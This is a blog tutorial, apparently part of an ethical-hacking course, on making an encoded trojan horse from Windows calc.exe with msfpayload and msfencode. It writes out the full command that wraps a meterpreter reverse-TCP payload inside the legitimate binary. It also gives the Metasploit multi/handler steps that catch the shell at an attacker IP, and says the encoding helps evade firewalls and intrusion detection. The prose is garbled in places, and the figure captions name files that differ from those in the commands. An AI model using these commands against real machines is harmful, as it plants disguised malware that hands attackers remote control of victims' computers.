Creating Trojan Horse (Encoded)By Using Msfpayload

MODULE 13:- Metasploit Framework

  1. 6 Metasploit Modules – You should know
  2. MSFvenom replacement of MSFpayload and msfencode – Full guide
  3. 6 Techniques to analyze the vulnerability scan report in Metasploit
  4. How to use Metasploit for vulnerability scanning
  5. How to use metasploit pro in Kali Linux
  6. Creating Persistent Backdoor By Metasploit in Kali Linux
  7. Creating Trojan Horse (Encoded)By Using Msfpayload

In this article I am going to teach you how to create trojan horse by using msfpayload and encode by msfencoder. But I want to tell you very important thing, that msfpayload and msfencoder is not exist anymore. I did not remove this article because some person is still using old Kali Linux version. If you want to read new Article, I have writen it separate.

New Article

MSFvenom replacement of MSFpayload and msfencode – Full guide  

Creating Trojan horse

The indirect accesses in the past areas run singularly out of sight and do not connect with the client logged into the System at the time. A Trojan horse gives the presence of functional program that the client may utilization. This guide was create from the calc.exe application from a Microsoft Windows XP, Service Pack 3 platform. For this activity to work accurately, the calc.exe application must be copied to an external thumb drive.

Not all binaries on the Windows platform are powerless to Trojanization. Case in point, if the calc.exe application from a Windows 7 Ultimate platform was used, this attack would not by any means execute. Other contemplations are the measure of encoding used, dynamic firewalls, IDS (Intrusion Detection System), and cryptosystems. Not all executable will work; Trojanization of an executable is an experimentation, exploration methodology, best suited for a lab

#msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /root/Desktop/calc.exe -o /root/Desktop/encodeTrojancalc.exe

Creating Trojan Horse (Encoded)By Using Msfpayload _o1

Figure shows the output from the making of the trojan-cmd-payload. exe Trojan horse from a Windows calc.exe binary. The Trojan horse made from the Windows binary calc.exe might be transferred to an exploited machine in various methods.


Set Up a Metasploit Listener:

The backdoor and Trojan horse that were made are client side attack and call home for further instruction. The Security analyzer will need to set up a lstener in Metasploit to answer the call. The multi-handler inside Metasploit is a celebrated voice-mail for a Trojan or backdoor to call home and get further instructions.


>use exploit/multi/handler

>set PAYLOAD windows/meterpreter/reverse_tcp

>set LHOST {Attacker_IP}

>set LPORT 4444


Creating Trojan Horse (Encoded)By Using Msfpayload _2

Given Figure shows the setup of a listener on Metasploit and a get back to from a backdoor. The connection was produced using the exploited victim’s Operating System with the unencoded-payload.exe application was executed.

Vijay Kumar

Ethical Hacking & Penetration Testing Trainer, For more detail view My Profile

Latest posts by Vijay Kumar (see all)

4 thoughts on “Creating Trojan Horse (Encoded)By Using Msfpayload

Leave a Reply

Your email address will not be published. Required fields are marked *